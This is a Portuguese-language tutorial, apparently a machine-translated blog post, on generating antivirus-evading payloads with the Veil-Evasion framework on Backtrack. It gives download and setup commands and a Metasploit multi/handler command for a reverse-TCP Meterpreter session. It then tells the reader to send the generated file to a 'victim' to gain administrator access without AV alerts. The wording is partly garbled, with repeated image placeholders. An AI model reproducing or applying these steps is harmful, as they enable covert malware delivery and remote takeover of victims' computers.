AV Bypass usando véu no Backtrack

Como podemos ignorar AV usando véu. Veil é ferramenta baseada python que criar FUD carga útil.

obs* (depois de download arrastar p/ o Desktop)

Como fazer o download e usar?

wget https://github.com/marrocamp/Veil-Framework-Veil-Evasion/archive/master.zip
cd Desktop
ls
unzip master.zip
ls
cd Veil-Framework-Veil-Evasion-master
ls
chmod 777 Veil-Evasion.py
./Veil-Evasion.py
----------------------------------------------------------------------------------------------------------------------------
 se der a mensagem - Necessary component missing coloque o codigo abaixo
/root/Desktop/Veil-Framework-Veil-Evasion-master/setup/setup.sh -s


Ele irá baixar todo o pacote python necessário para a geração de carga útil.

Veil é oficialmente suportado em Kali linux; Mas it`s ferramenta baseada python para que possamos usá-lo em qualquer sistema operacional que é capaz de executar o script python. Usei-o em Backtrack 5.We tem que fazer alguma mudança no arquivo gerado veil.py para começar a trabalhar em retorno.
Abrir diretório de véu e ir para Config e veil.py. aberta (Na versão mais recente do véu, /etc/veil/settings.py aberto) Se você instalou metasploit do pacote binário, em seguida, Alterar linha de caminho metasploit para / opt / metasploit / apps / pro / msf3 / e salvá-lo.

Ir para véu direcory & run
./Veil.py

AV-bypass-using-veil

Agora digite lista e você pode ver disponível carga útil.

AV-bypass-using-veil

Seleccionar carga útil.
AV-bypass-using-veil
escreva gerar.
AV-bypass-using-veil

AV-bypass-using-veil

AV-bypass-using-veil
Depois disso payload foi gerado e você tem que começar listner metasploit para esse tipo de carga útil seguinte no terminal.

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=444 E
AV-bypass-using-veil
Agora enviar arquivo para vítima. Assim que abrir o arquivo que você tenha acesso de administrador sem disparar AV alert.Look no meu status de atualização de AV.
AV-bypass-using-veil


AV-bypass-using-veil

Como você pode ver na parte inferior do painel que AV é ativar e it`s atualizado; ainda podemos ignorar AV & obter meterpreter seesion.